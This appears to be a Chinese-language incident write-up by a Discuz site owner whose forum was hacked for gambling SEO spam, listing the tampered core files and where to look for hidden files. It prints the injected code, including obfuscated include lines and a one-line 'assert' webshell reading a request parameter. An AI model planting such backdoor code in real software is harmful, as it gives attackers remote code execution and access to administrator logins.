最近發現站點被黑了,現在還不知道是由系統漏洞導致的系統賬戶被攻陷,還是程序漏洞,文件被篡改。有一些敏感關鍵詞(例如:賭博,電子路單)被惡意指向,點擊搜索結果自動跳轉到其他站點,而且是大量的,通過搜索“site:xxx.com 賭博”,會發現一大堆。該目的是為該站點導流量,還有傳遞權重。
為了防止暴露,入侵者會把被篡改的文件時間戳保持不變,所以通過修改時間是發現不到可疑文件的
現在解決辦法只限於,查找程序源碼,一個一個文件對比最初的文件,最后發現有兩個文件最重要,如下:
- source/function/function_core.php
- uc_server/control/admin/user.php
- source/class/discuz/discuz_admincp.php
- source/class/discuz/discuz_application.php
因為這四個文件,function_core.php是是核心函數庫所有頁面都會包含;user.php是ucenter后台登陸,discuz_admincp.php是discuz管理中心用戶登錄,都可以獲得管理員賬號和密碼;discuz_application.php是整個discuz初始化的核心類文件,初始化加載。
遇到相同問題的朋友,請首先查看這幾個文件是否被修改。
入侵方式一:一般會在全局文件中include一個外部的文件,例如:
@include('/dev/shm/.../tmp');
@include(PACK('H*','2f746d702f2e612f636c69656e742e706870'));
入侵方式二:
植入代碼,可以執行外部傳入的代碼,例如:@array_map("ass\x65rt",(array)@$_REQUEST['ADMINCPS']);
ass\x65rt 其實就是 “assert”。
根據上面的線索,在下面的地方應該可以發現一些有惡意代碼的文件,一般是惡意搜索引擎
- 系統的虛擬內存是否有東西,ls -a /dev/shm/ 例如:三個點的... 的隱藏文件
- ls -a /tmp 這個也要注意
順便舉報一些黑站:
- mujj.wang